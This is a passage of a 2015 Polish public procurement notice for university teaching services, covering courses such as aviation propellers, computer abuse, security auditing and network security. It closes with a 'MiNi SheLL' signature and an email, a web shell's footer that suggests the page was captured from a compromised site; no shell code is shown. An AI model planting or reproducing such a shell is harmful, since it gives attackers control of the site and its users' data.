Zajęcia muszą mieć formę ćwiczeń laboratoryjnych w ilości 30  godzin (1 godzina lekcyjna = 45 minut). W ramach zajęć powstanie 1 grupa studencka (laboratoryjna), która będzie składała się maksymalnie z 15 osób. 2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego 3. Termin realizacji: -  termin przeprowadzenia zajęć  do 30.11.2015 r. -  przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania, sylabusów oraz karty pracy. do 01.12.2015r. Przekazanie dokumentacji z egzaminów do 01.12.2015 r. 4. UWAGA. W pkt 3) dot. tej części zamówienia, ze względu na możliwości techniczne wpisano datę zakończenia tj. 01.12.2015 r., natomiast obowiązujący jest termin wskazany powyżej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Śmigła lotnicze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Śmigła lotnicze dla studentów V sem. Specjalności Nawigacja Powietrzna studia stacjonarne I stopnia na Kierunek Transport.
Zajęcia muszą mieć formę ćwiczeń laboratoryjnych w ilości 45 godzin (1 godzina lekcyjna = 45 minut). W ramach zajęć powstanie 1 grupa studencka (laboratoryjna), która będzie składała się maksymalnie z 15 osób. 2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego 3. Termin realizacji: -  termin przeprowadzenia zajęć  do 30.11.2015 r. -  przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania, sylabusów oraz karty pracy. do 01.12.2015r. Przekazanie dokumentacji z egzaminów do 01.12.2015 r. 4. UWAGA. W pkt 3) dot. tej części zamówienia, ze względu na możliwości techniczne wpisano datę zakończenia tj. 01.12.2015 r., natomiast obowiązujący jest termin wskazany powyżej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6 - Przeprowadzenie zajęć, konsultacji i egzaminów  z przedmiotu Nadużycia komputerowe z elementami kryminalistyki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje  przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Nadużycia komputerowe z elementami kryminalistyki dla studentów I roku studia niestacjonarne II stopnia kierunku Informatyka przemysłowa.
Celem zajęć jest poszerzenie wiedzy teoretycznej uczestników na temat nadużycia komputerowego z elementami kryminalistyki. Zajęcia muszą mieć formę wykładu w ilości 18 godzin. (1 godzina lekcyjna = 45 minut). W ramach zajęć powstanie 1 grupa studencka (wykładowa), która będzie składała się maksymalnie z 30 osób. 2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego 3. Termin realizacji: -  termin przeprowadzenia zajęć  do 30.11.2015 r. -  przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania, sylabusów oraz karty pracy. do 01.12.2015r. Przekazanie dokumentacji z egzaminów do 01.12.2015 r. 4. UWAGA. W pkt 3) dot. tej części zamówienia, ze względu na możliwości techniczne wpisano datę zakończenia tj. 01.12.2015 r., natomiast obowiązujący jest termin wskazany powyżej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu Integracja Systemów Zarządzania Przedsiębiorstwem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Integracja Systemów Zarządzania Przedsiębiorstwem dla studentów II semestru kierunku Informatyka przemysłowa, studia niestacjonarne II stopnia, specjalność Systemy Przemysłowe Czasu Rzeczywistego.
Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat integracji systemów zarządzania przedsiębiorstwem. 
Zajęcia muszą mieć formę wykładu  w ilości 9 godzin oraz  ćwiczeń laboratoryjnych w ilości 18 godzin. Łącznie wykonanie 27 godz. zajęć dydaktycznych.
 (1 godzina lekcyjna = 45 minut). W ramach zajęć powstaną  2 grupy studenckie (laboratoryjne), które będą składały się maksymalnie z 25 osób każda i 1 grupa wykładowa, która będzie składała się  maksymalnie z 50 osób. 2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego 3. Termin realizacji: -  termin przeprowadzenia zajęć  do 30.11.2015 r. -  przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania, sylabusów oraz karty pracy. do 01.12.2015r. Przekazanie dokumentacji z egzaminów do 01.12.2015 r. 4. UWAGA. W pkt 3) dot. tej części zamówienia, ze względu na możliwości techniczne wpisano datę zakończenia tj. 01.12.2015 r., natomiast obowiązujący jest termin wskazany powyżej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu  Audyt bezpieczeństwa systemów informatycznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Audyt bezpieczeństwa systemów informatycznych dla studentów II semestru kierunku Informatyka przemysłowa, studia niestacjonarne II stopnia, specjalność Audyt bezpieczeństwa systemów informatycznych.
Celem zajęć jest poszerzenie wiedzy praktycznej uczestników na temat integracji systemów zarządzania przedsiębiorstwem. Zajęcia muszą mieć formę wykładu  w ilości 18 godzin (1 godzina lekcyjna = 45 minut). Grupa studencka będzie składała się maksymalnie z 30 osób co będzie stanowić 1 grupę wykładową. 2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego 3. Termin realizacji: -  termin przeprowadzenia zajęć  do 30.11.2015 r. -  przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania, sylabusów oraz karty pracy. do 01.12.2015r. Przekazanie dokumentacji z egzaminów do 01.12.2015 r. 4. UWAGA. W pkt 3) dot. tej części zamówienia, ze względu na możliwości techniczne wpisano datę zakończenia tj. 01.12.2015 r., natomiast obowiązujący jest termin wskazany powyżej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9 - Przeprowadzenie zajęć, konsultacji i egzaminów z przedmiotu  Bezpieczeństwo systemów i sieci komputerowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje przeprowadzenie zajęć wraz z konsultacjami oraz zaliczenia z przedmiotu Bezpieczeństwo systemów i sieci komputerowych dla studentów II semestru kierunku Informatyka przemysłowa, studia niestacjonarne II stopnia, specjalność Bezpieczeństwo Systemów Informatycznych.
Zajęcia muszą mieć formę wykładu  w ilości 9 godzin  oraz  ćwiczeń laboratoryjnych w ilości 18 godzin. Łącznie wykonanie 27 godz. zajęć dydaktycznych.
 (1 godzina lekcyjna = 45 minut). Grupa studencka będzie składała się maksymalnie z  30 osób co będzie stanowić 1 grupę wykładową oraz 2 grupy laboratoryjne max. po 15 osób. 2. CPV: 80.30.00.00-7 Usługi szkolnictwa wyższego 3. Termin realizacji: -  termin przeprowadzenia zajęć  do 30.11.2015 r. -  przekazanie Zamawiającemu do zatwierdzenia: listy obecności, sprawozdania, sylabusów oraz karty pracy. do 01.12.2015r. Przekazanie dokumentacji z egzaminów do 01.12.2015 r. 4. UWAGA. W pkt 3) dot. tej części zamówienia, ze względu na możliwości techniczne wpisano datę zakończenia tj. 01.12.2015 r., natomiast obowiązujący jest termin wskazany powyżej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com